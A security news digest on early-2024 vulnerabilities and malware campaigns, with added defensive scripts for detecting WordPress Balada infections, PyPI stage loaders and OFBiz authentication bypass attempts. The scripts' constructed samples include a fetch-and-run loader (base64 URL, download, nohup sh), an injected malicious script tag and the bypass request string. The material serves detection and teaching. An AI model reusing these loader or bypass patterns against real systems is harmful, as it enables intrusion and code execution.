how human behavior affects security

Programmer’s Digest #66

01/10/2024-01/17/2024 Citrix, VMware, and Atlassian Hit with Critical Flaws, SonicWall Firewalls Potentially Vulnerable, Critical RCE Vulnerability And More.

1. GitHub Rotates Keys After High-Severity Vulnerability Exposes Credentials

GitHub has rotated several keys in response to a security vulnerability, including the GitHub commit signing key and the customer encryption keys for GitHub Actions, Codespaces, and Dependabot. The high-severity flaw (CVE-2024-0200, CVSS score: 7.2) was reported through GitHub’s bug bounty program on December 26, 2023, and fixed on GitHub.com the same day. GitHub has found no evidence of exploitation, but urges anyone who relies on the old commit signing key to import the new one. GitHub Enterprise Server (GHES) is also affected; exploiting it there requires an attacker to be authenticated as a user with the organization owner role on the GHES instance, which limits the practical risk. A second bug (CVE-2024-0507, CVSS score: 6.5) was patched at the same time: an attacker with a Management Console user account holding the editor role could escalate privileges through command injection. The rotation follows earlier incidents, including GitHub’s replacement of its RSA SSH host key in March 2023.

2. Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild:

  • CVE-2023-6548 (CVSS score: 5.5) – Authenticated (low-privileged) remote code execution on the management interface (requires access to the NSIP, CLIP, or SNIP with management interface access)
  • CVE-2023-6549 (CVSS score: 8.2) – Denial-of-service (requires that the appliance be configured as a Gateway or as an authentication, authorization, and accounting (AAA) virtual server)

NetScaler ADC and NetScaler Gateway version 12.1 is end of life and will not receive a fix; customers still on it should upgrade to a supported version that patches the flaws. Citrix also recommends keeping the management interface off the internet and separated from production traffic, which sharply limits exposure to CVE-2023-6548. In recent months, other Citrix appliance vulnerabilities (CVE-2023-3519 and CVE-2023-4966) have been weaponized by threat actors to drop web shells and hijack existing authenticated sessions.

3. Alert: Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits – Act Now

Over 178,000 SonicWall next-generation firewalls with their management interface exposed online are vulnerable to at least one of two flaws that can cause a denial-of-service (DoS) condition and potentially remote code execution (RCE). The two bugs, CVE-2022-22274 (CVSS score: 9.4) and CVE-2023-0656 (CVSS score: 7.5), are stack-based buffer overflows in SonicOS; Jon Williams, a senior security engineer at Bishop Fox, notes that they are fundamentally the same bug, reachable through different HTTP URI paths because the same vulnerable code pattern was reused. Both can be triggered by a remote, unauthenticated attacker. Even without a working RCE exploit, an attacker can crash the appliance repeatedly and force it into maintenance mode, where it stays until an administrator intervenes to restore normal functionality.

4. Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability

Thousands of WordPress sites running a vulnerable version of the Popup Builder plugin have been compromised by the Balada Injector malware. First documented by Doctor Web in January 2023, the campaign has been active since 2017 and, by Sucuri’s count, has infiltrated over 1 million sites; it exploits known flaws in WordPress plugins to inject a backdoor that redirects visitors to fake tech-support pages and other scams. The current wave abuses a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8), disclosed by WPScan and patched in version 4.2.3, to insert a malicious JavaScript file hosted on specialcraftbox[.]com. The injected script checks whether the visitor carries logged-in WordPress administrator cookies; when an admin views an infected page, it uses that session to install a rogue backdoor plugin, which fetches a second-stage payload. That payload, saved as “sasas”, scans for WordPress installation directories and modifies wp-blog-header.php to inject the Balada JavaScript, while uploaded backdoors and rogue administrator accounts give the attackers persistent control of the site.
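The infection chain above leaves three kinds of evidence on a site: a modified core file, a script tag pulling JavaScript from the injector’s domain, and a dropped file or extra administrator account. The following is an added triage script written for this page, not code from Sucuri or from the WordPress project. It checks a site snapshot for all three. The site contents, the admin list, the allowed script hosts and the “known good” copy of wp-blog-header.php are constructed for the example; in practice the baseline hash should come from a pristine WordPress release of the same version.

```python
import hashlib
import re

# <script src="//host/..."> with http, https or protocol-relative URLs; captures the host
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc=["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)

# IOC taken from the report above (written defanged there as specialcraftbox[.]com)
IOC_HOSTS = {"specialcraftbox.com"}
# Assumed for this example: hosts allowed to serve scripts on the site being checked
ALLOWED_HOSTS = {"example.org", "cdn.example.org"}
# Assumed for this example: administrator logins that are supposed to exist
EXPECTED_ADMINS = {"siteowner"}
# File name the report says the second-stage payload is saved under
DROPPED_FILE_NAMES = {"sasas"}


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Constructed stand-in for core wp-blog-header.php. In practice, hash the file from a
# pristine WordPress release of the same version rather than this placeholder.
KNOWN_GOOD = {"wp-blog-header.php": "<?php\nrequire_once __DIR__ . '/wp-load.php';\nwp();\n"}
KNOWN_GOOD_HASHES = {path: sha256(body) for path, body in KNOWN_GOOD.items()}


def scan_site(files, admins):
    """files: {relative path: content}; admins: admin logins. Returns (where, finding) pairs."""
    findings = []
    for path, content in files.items():
        name = path.rsplit("/", 1)[-1]
        # 1. core file integrity (the injector rewrites wp-blog-header.php)
        if path in KNOWN_GOOD_HASHES and sha256(content) != KNOWN_GOOD_HASHES[path]:
            findings.append((path, "core-file-modified"))
        # 2. script tags pulling JavaScript from hosts we do not expect
        for host in SCRIPT_SRC_RE.findall(content):
            host = host.lower()
            if host in IOC_HOSTS:
                findings.append((path, "balada-ioc:" + host))
            elif host not in ALLOWED_HOSTS:
                findings.append((path, "external-script:" + host))
        # 3. dropped payload recognised by its file name
        if name in DROPPED_FILE_NAMES:
            findings.append((path, "dropped-payload-name"))
    # 4. rogue administrator accounts
    for user in sorted(set(admins) - EXPECTED_ADMINS):
        findings.append(("user:" + user, "unexpected-admin"))
    return findings


# Constructed sample of a compromised site: an injected loader in the core header file,
# the dropped "sasas" payload, a legitimate theme script, and one extra admin account.
SITE_FILES = {
    "wp-blog-header.php": KNOWN_GOOD["wp-blog-header.php"].replace(
        "<?php", "<?php\necho '<script src=\"https://specialcraftbox.com/x.js\"></script>';", 1),
    "wp-content/uploads/sasas": "#!/bin/sh\n# constructed stub\n",
    "wp-content/themes/t/header.php": '<script src="https://cdn.example.org/app.js"></script>',
}
SITE_ADMINS = {"siteowner", "wp-system"}

if __name__ == "__main__":
    for where, what in scan_site(SITE_FILES, SITE_ADMINS):
        print(f"{what:35} {where}")
```

The hash check is the one that catches variants: the script tag and the file name change between waves, but any edit to a core PHP file is an indicator regardless of what was written into it.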

5. Critical RCE Vulnerability Uncovered in Juniper SRX Firewalls and EX Switches

Juniper Networks has released updates for a critical remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. Tracked as CVE-2024-21591 (CVSS score: 9.8), it is an out-of-bounds write in J-Web, the Junos OS web management interface, that lets an unauthenticated, network-based attacker cause a denial-of-service (DoS) or achieve RCE with root privileges on the device; according to Juniper, the root cause is the use of an insecure function that allows an attacker to overwrite arbitrary memory. Until the fixes are deployed, Juniper recommends disabling J-Web or restricting access to it to trusted hosts only. Juniper also resolved a high-severity bug (CVE-2024-21611, CVSS score: 7.5) in Junos OS and Junos OS Evolved that could cause a DoS condition. There is no evidence of exploitation so far, but the fixes come after a chain of J-Web flaws in the same product lines was exploited in the wild last year.

6. New PoC Exploit for Apache OFBiz Vulnerability Poses Risk to ERP Systems

VulnCheck has developed a proof-of-concept (PoC) exploit for a critical flaw (CVE-2023-51467, CVSS score: 9.8) in the Apache OFBiz ERP system that executes a payload entirely from memory, leaving minimal traces on disk. CVE-2023-51467 bypasses the incomplete fix for another critical flaw (CVE-2023-49070, CVSS score: 9.8) in the same software, which allowed authentication bypass and remote code execution. Both are fixed in Apache OFBiz 18.12.11, yet threat actors are actively scanning for and attempting to exploit unpatched instances. OFBiz has a history of exploited vulnerabilities, and this one joins the list. Public exploits so far have relied on the fact that the Groovy scripting sandbox in OFBiz is incomplete, which is enough to run curl and obtain a bash reverse shell on Linux hosts; VulnCheck’s PoC shows the same access being used to load a payload directly into memory, so defenders should not count on finding a dropped file.

7. Act Now: CISA Flags Active Exploitation of Microsoft SharePoint Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical privilege escalation vulnerability in Microsoft SharePoint Server (CVE-2023-29357, CVSS score: 9.8) to its Known Exploited Vulnerabilities catalog based on evidence of active exploitation. An attacker who can present a spoofed JWT authentication token to the server can bypass authentication over the network and obtain administrator privileges, with no user interaction required. Microsoft patched the bug in its June 2023 Patch Tuesday release; at Pwn2Own Vancouver 2023 it was chained with a second SharePoint bug, CVE-2023-24955, to achieve remote code execution, so both patches matter. Details of the in-the-wild exploitation and the actors behind it are not public; federal agencies are required to apply the fixes by January 31, 2024. Microsoft notes that customers with automatic updates enabled are already protected.

Programmer’s Digest #65

01/04/2024-01/10/2024 Microsoft’s January 2024 Windows Update Patches 48 New Vulnerabilities, CISA Flags 6 Vulnerabilities, Hackers Target Microsoft SQL Servers And More.

1. Microsoft’s January 2024 Windows Update Patches 48 New Vulnerabilities

Microsoft’s Patch Tuesday updates for January 2024 fix 48 security flaws across its software: two rated Critical and 46 Important, none of them publicly known or under active attack at release, which makes this the second consecutive Patch Tuesday without a zero-day. These are in addition to nine fixes that landed in the Chromium-based Edge browser since the December update, including one for the actively exploited WebRTC zero-day CVE-2023-7024. The two Critical bugs are CVE-2024-20674, a Windows Kerberos security feature bypass, and CVE-2024-20700, a remote code execution flaw in Windows Hyper-V. Exploiting CVE-2024-20674 requires the attacker to already have a position on the network from which to spoof the Kerberos server; CVE-2024-20700 needs no authentication but requires winning a race condition. Other notable flaws include a privilege escalation in the Common Log File System (CLFS) driver (CVE-2024-20653) and a security feature bypass in the SQL client libraries (CVE-2024-0056).

2. CISA Flags 6 Vulnerabilities – Apple, Apache, Adobe, D-Link, Joomla Under Attack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six actively exploited security flaws to its Known Exploited Vulnerabilities (KEV) catalog. Among them is CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability in Apache Superset stemming from an insecure default SECRET_KEY that lets an unauthenticated attacker forge session cookies and ultimately execute code; it was fixed in version 2.1.
CISA also highlighted five other flaws:

  • CVE-2023-38203 (CVSS score: 9.8) – Adobe ColdFusion Deserialization of Untrusted Data
  • CVE-2023-29300 (CVSS score: 9.8) – Adobe ColdFusion Deserialization of Untrusted Data
  • CVE-2023-41990 (CVSS score: 7.8) – Apple Multiple Products Code Execution
  • CVE-2016-20017 (CVSS score: 9.8) – D-Link DSL-2750B Devices Command Injection
  • CVE-2023-23752 (CVSS score: 5.3) – Joomla! Improper Access Control

Notably, CVE-2023-41990, fixed by Apple in iOS 15.7.8 and iOS 16.3, was exploited in the Operation Triangulation spyware attacks via a crafted iMessage PDF attachment. Federal Civilian Executive Branch agencies are urged to apply fixes by January 29, 2024, to counter active threats.

3. Alert: New Vulnerabilities Discovered in QNAP and Kyocera Device Manager

Kyocera’s Device Manager product is susceptible to a disclosed security flaw (CVE-2023-50916) allowing attackers to coerce authentication attempts to malicious resources, potentially leading to data theft and NTLM relay attacks. The vulnerability arises from a path traversal issue, now resolved in Kyocera Device Manager version 3.1.1213.0.
In a related development, QNAP addressed multiple high-severity vulnerabilities:

  • CVE-2023-39296: Prototype pollution flaw in QTS and QuTS hero.
  • CVE-2023-47559: XSS vulnerability in QuMagie.
  • CVE-2023-47560: OS command injection flaw in QuMagie.
  • CVE-2023-41287: SQL injection vulnerability in Video Station.
  • CVE-2023-41288: OS command injection flaw in Video Station.
  • CVE-2022-43634: Unauthenticated remote code execution flaw in Netatalk.

While no evidence of exploitation exists, users are urged to update to the latest versions of affected products to mitigate potential risks.

4. Alert: Ivanti Releases Patch for Critical Vulnerability in Endpoint Manager Solution

Ivanti addressed critical vulnerabilities in its Endpoint Manager (EPM) and Avalanche solutions. CVE-2023-39336 impacts EPM versions 2021 and 2022 (pre-SU5), posing a risk of remote code execution through SQL injection, with a severity score of 9.6.
In a separate update, Ivanti resolved 21 flaws in Avalanche, 13 of which were critical buffer overflows (CVSS scores: 9.8), patched in Avalanche 6.4.2. These could lead to denial-of-service or code execution if exploited by attackers sending specially crafted data packets to the Mobile Device Server.
While no evidence exists of exploitation, it’s worth noting that state-backed actors previously exploited zero-day flaws (CVE-2023-35078 and CVE-2023-35081) in Ivanti’s Endpoint Manager Mobile (EPMM) to breach Norwegian government networks. Users should apply the provided updates to mitigate potential risks.

5. Hackers Target Microsoft SQL Servers In Mimic Ransomware Attacks

A financially motivated Turkish threat actor tracked as RE#TURGENCE is targeting Microsoft SQL (MSSQL) servers worldwide to deploy Mimic (N3ww4v3) ransomware. The campaign, which has hit organizations in the EU, the U.S., and Latin America, ends either with access to the compromised host being sold or with ransomware being deployed. Initial access comes from brute-forcing administrator credentials on internet-exposed, poorly secured MSSQL servers, after which the attackers use xp_cmdshell to obtain a command shell, run heavily obfuscated Cobalt Strike payloads, install AnyDesk for remote desktop access, and harvest credentials with Mimikatz. The Mimic ransomware itself is dropped via AnyDesk, encrypts files, and displays a ransom note; the group’s tooling links it to earlier Phobos ransomware attacks, and Securonix previously exposed a similar MSSQL campaign (DB#JAMMER) delivering Mimic last year. Administrators should keep MSSQL off the internet, enforce strong credentials, and leave xp_cmdshell disabled.

Programmer’s Digest #64

12/27/2023-01/04/2024 3 Malicious PyPI Packages, Privilege Escalation Flaw Impacting Kubernetes Service, Critical Zero-Day in Apache OFBiz ERP System And More.

1. Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners

Three malicious packages named modularseven, driftme, and catme were found in the Python Package Index (PyPI) with the ability to deploy a cryptocurrency miner on Linux hosts; together they drew 431 downloads over the past month before being taken down. On first use, the malicious code in each package’s __init__.py decodes an embedded string to retrieve the first stage from a remote server, a shell script (“unmi.sh”) that fetches a configuration file for the mining activity and the CoinMiner ELF binary hosted on GitLab, then launches the miner in the background with nohup so that it keeps running after the session exits. Like the earlier “culturestreak” package, these hide the real payload by hosting it at a remote URL rather than in the package itself, which makes the malicious code far less likely to be noticed during review.
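The loader described above is small, but its shape (decode an embedded string, fetch something from it, run the result in the background) is recognisable without executing anything. The following is an added example written for this page, not code from Fortinet or from PyPI: it parses a package entry point with Python’s ast module and reports which parts of that chain are present. The two __init__.py samples are constructed; the base64 blob in the suspect one decodes to a non-routable placeholder URL, and nothing in the samples is ever executed, only parsed.

```python
import ast

# Call targets that together make up the staged loader described above:
# decode an embedded blob -> fetch a remote stage -> run it.
SUSPICIOUS_CALLS = {
    "decode": {"base64.b64decode", "base64.b32decode", "codecs.decode", "zlib.decompress"},
    "download": {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"},
    "execute": {"subprocess.Popen", "subprocess.run", "subprocess.call",
                "os.system", "os.popen", "exec", "eval"},
}
# Strings that keep a process alive after the install/import session ends
BACKGROUND_MARKERS = ("nohup", "setsid", "disown")


def _dotted_name(node):
    """Render a Name/Attribute chain such as urllib.request.urlopen; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source):
    """Return the set of behaviour categories found in Python source (no execution)."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            for category, names in SUSPICIOUS_CALLS.items():
                if name in names:
                    found.add(category)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(marker in node.value for marker in BACKGROUND_MARKERS):
                found.add("background")
    return found


def verdict(source):
    """'stage-loader' only when the full decode -> download -> execute chain is present."""
    categories = scan_source(source)
    if {"decode", "download", "execute"} <= categories:
        return "stage-loader", categories
    return ("review" if categories else "clean"), categories


# Constructed __init__.py mimicking the reported loader. The blob decodes to
# http://example.invalid/unmi.sh, a placeholder; this text is parsed, never run.
SUSPECT_INIT = '''
import base64, subprocess, urllib.request
_url = base64.b64decode("aHR0cDovL2V4YW1wbGUuaW52YWxpZC91bm1pLnNo").decode()
_stage = urllib.request.urlopen(_url).read()
open("/tmp/unmi.sh", "wb").write(_stage)
subprocess.Popen("nohup sh /tmp/unmi.sh >/dev/null 2>&1 &", shell=True)
'''

# Constructed benign package entry point for comparison
BENIGN_INIT = '''
from .core import connect, Session
__all__ = ["connect", "Session"]
__version__ = "1.0.2"
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_INIT), ("benign", BENIGN_INIT)):
        print(label, *verdict(src))
```

A single category is only a “review” signal, since plenty of legitimate packages download or spawn processes; it is the complete chain in a module that runs at import time that matches the pattern described in the report. Obfuscated loaders that build call names dynamically (getattr, importlib) will not resolve through _dotted_name and need a runtime sandbox instead.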

2. Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service

Google Cloud has patched a medium-severity flaw in its Kubernetes service that an attacker who already has access to a cluster could use to escalate privileges. An attacker who has compromised the Fluent Bit logging container, for example through a remote code execution flaw in a workload, could combine that foothold with the high privileges required by Anthos Service Mesh (ASM), on clusters that have it enabled, to take over the cluster. Palo Alto Networks Unit 42, which discovered and reported the issue, said adversaries could weaponize it to carry out “data theft, deploy malicious pods, and disrupt the cluster’s operations.” Concretely, the Fluent Bit container could read the service account tokens of other pods on the node, use ASM’s service account token, and then create a new pod with cluster-admin privileges. Google’s fix removes Fluent Bit’s access to the service account tokens and re-architects ASM to drop its excessive role-based access control (RBAC) permissions.

3. Critical Zero-Day in Apache OFBiz ERP System Exposes Businesses to Attack

A zero-day security flaw in Apache OFBiz, an open-source Enterprise Resource Planning (ERP) system, can be exploited to bypass the application’s authentication. Tracked as CVE-2023-51467, the vulnerability lies in the login functionality and stems from an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was fixed in OFBiz 18.12.10 at the start of December 2023. CVE-2023-51467 can be triggered by sending empty or invalid USERNAME and PASSWORD parameters in an HTTP request while setting the parameter requirePasswordChange to Y in the URL: the login code then returns a success status regardless of the credentials supplied, giving the attacker access to internal resources that should require authentication. Users should upgrade to Apache OFBiz 18.12.11, which addresses both vulnerabilities, without delay.
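The request pattern described here (and in item 6 of Digest #66 above) is easy to hunt for in web server logs. The following is an added example written for this page, not code from the Apache OFBiz project or from VulnCheck: it parses combined-format access log lines and flags requests under the /webtools/control/ servlet path that carry requirePasswordChange=Y in the query string. The log lines are constructed samples; the endpoint paths and IP addresses in them are placeholders, not a specific exploit target.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common/combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

OFBIZ_CONTROL_PREFIX = "/webtools/control/"


def parse_line(line):
    """Split one access-log line into fields; None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so that USERNAME= (present but empty) is not silently dropped
    rec["query"] = {k.lower(): v[0]
                    for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def classify(rec):
    """Return a reason string if the request looks like a CVE-2023-51467 bypass, else None."""
    if rec is None or not rec["path"].startswith(OFBIZ_CONTROL_PREFIX):
        return None
    q = rec["query"]
    # requirePasswordChange belongs to OFBiz's own password-change flow; a client
    # supplying it in the URL alongside the login parameters is the hallmark of the bypass.
    if q.get("requirepasswordchange", "").upper() != "Y":
        return None
    if q.get("username", "") == "" or q.get("password", "") == "":
        return "requirePasswordChange=Y with empty credentials"
    return "requirePasswordChange=Y with non-empty (likely invalid) credentials"


def find_bypass_attempts(lines):
    hits = []
    for line in lines:
        rec = parse_line(line)
        reason = classify(rec)
        if reason:
            hits.append({"ip": rec["ip"], "path": rec["path"],
                         "status": rec["status"], "reason": reason})
    return hits


# Constructed sample log lines; IPs are from documentation ranges and the paths are
# generic webtools control endpoints, not a specific exploit target.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Dec/2023:10:01:02 +0000] "POST /webtools/control/main?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 1532',
    '198.51.100.2 - - [28/Dec/2023:10:01:05 +0000] "GET /webtools/control/main HTTP/1.1" 200 4021',
    '198.51.100.2 - - [28/Dec/2023:10:02:11 +0000] "POST /webtools/control/login?USERNAME=admin&PASSWORD=ofbiz HTTP/1.1" 302 0',
    '192.0.2.9 - - [28/Dec/2023:10:03:00 +0000] "POST /webtools/control/main?USERNAME=x&PASSWORD=y&requirePasswordChange=Y HTTP/1.1" 200 1532',
]

if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged request is the worrying case, since the bypass returns an authentication success; a 403 from a patched instance still records that someone is probing. Note that POST bodies are not in access logs, so this catches only the query-string form of the parameters.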

4. CISA warns of actively exploited bugs in Chrome and Excel parsing library

The first issue CISA added to its Known Exploited Vulnerabilities (KEV) catalog is CVE-2023-7101, a remote code execution vulnerability affecting versions 0.65 and older of the Perl library Spreadsheet::ParseExcel. The bug arises because the library passes unvalidated input from a file into a string-type eval: specifically, Number format strings found in the spreadsheet are evaluated as Perl code during parsing, so a crafted .xls file can run attacker-supplied code in the parser’s process. One product using the library is the Barracuda Email Security Gateway (ESG), which was targeted in late December by a Chinese threat actor exploiting CVE-2023-7101 to compromise appliances. The second addition is CVE-2023-7024, a heap buffer overflow in WebRTC in Google Chrome that allows an attacker to cause crashes or code execution; because WebRTC is shared code, other browsers built on it are affected too. Google’s Threat Analysis Group (TAG) discovered the flaw, and Google shipped an emergency fix on December 20 in versions 120.0.6099.129/130 for Windows and 120.0.6099.129 for Mac and Linux.

5. ‘everything’ blocks devs from removing their own npm packages

Over the holidays, the npm registry was flooded with more than 3,000 packages, among them one named “everything” and many variations on the word. Installing everything would at worst fill your disk and slow your machine down, but the package’s mere existence on npmjs.com stops authors who have nothing to do with it from unpublishing their own packages from the world’s largest JavaScript registry. “everything” lists just five sub-packages, published under the “@everything-registry” scope, as its dependencies. Those five, however, fan out until they pull in every package on the registry: “everything” depends on “@everything-registry/chunk-2”, which in turn pulls in further packages by the same author such as “@everything-registry/sub-chunk-1623”, and each of these sub-packages (or “chunks”, as the author calls them) ultimately lists about 800 npm projects as dependencies. The problem is that npm refuses to unpublish a package that other packages depend on; since “everything” now depends on every package, including yours, yours is stuck behind a dependency you never asked for and cannot remove.
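The mechanism is just graph reachability in two directions: the dependency closure of “everything” reaches every package, and the reverse closure of your package therefore contains “everything”, which is what the unpublish check looks at. The following is an added example written for this page, not npm’s code: it models a miniature registry as a dictionary of direct dependencies, computes both closures iteratively (the real graph is far too deep for recursion), and applies the single rule that matters here, that a package with any dependents cannot be unpublished. The registry contents and package names other than “everything” and the “@everything-registry” scope are constructed.

```python
# Constructed miniature registry: package -> direct dependencies. The real "everything"
# has five scoped sub-packages that fan out into chunks of roughly 800 packages each.
REGISTRY = {
    "everything": ["@everything-registry/chunk-1", "@everything-registry/chunk-2"],
    "@everything-registry/chunk-1": ["@everything-registry/sub-chunk-1",
                                     "@everything-registry/sub-chunk-2"],
    "@everything-registry/chunk-2": ["@everything-registry/sub-chunk-3"],
    "@everything-registry/sub-chunk-1": ["left-pad", "your-lib"],
    "@everything-registry/sub-chunk-2": ["lodash", "your-lib"],
    "@everything-registry/sub-chunk-3": ["express", "unrelated-tool"],
    "left-pad": [],
    "lodash": [],
    "express": [],
    "your-lib": [],
    "unrelated-tool": [],
    "orphan-lib": [],  # nothing depends on this one
}


def transitive_deps(registry, root):
    """All packages reachable from root along dependency edges (iterative, cycle-safe)."""
    seen, stack = set(), [root]
    while stack:
        for dep in registry.get(stack.pop(), ()):
            if dep not in seen:
                seen.add(dep)
                stack.append(dep)
    return seen


def reverse_index(registry):
    """dependency -> set of packages that list it directly."""
    rev = {}
    for pkg, deps in registry.items():
        for dep in deps:
            rev.setdefault(dep, set()).add(pkg)
    return rev


def dependents(registry, pkg):
    """Packages that depend on pkg directly or through any chain (what blocks an unpublish)."""
    rev = reverse_index(registry)
    seen, stack = set(), [pkg]
    while stack:
        for parent in rev.get(stack.pop(), ()):
            if parent not in seen:
                seen.add(parent)
                stack.append(parent)
    return seen


def can_unpublish(registry, pkg):
    """npm refuses to unpublish a package that any other published package depends on."""
    return not dependents(registry, pkg)


if __name__ == "__main__":
    print(len(transitive_deps(REGISTRY, "everything")), "packages pulled in by everything")
    for name in ("your-lib", "orphan-lib", "everything"):
        print(name, "unpublishable" if can_unpublish(REGISTRY, name) else
              "blocked by " + ", ".join(sorted(dependents(REGISTRY, name))))
```

Only the dependents rule is modelled; npm’s real unpublish policy also has age and download-count conditions, which are beside the point here. The asymmetry the example makes visible is the whole problem: “everything” itself has no dependents and could be removed by its author at any time, while every package it reaches is frozen.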
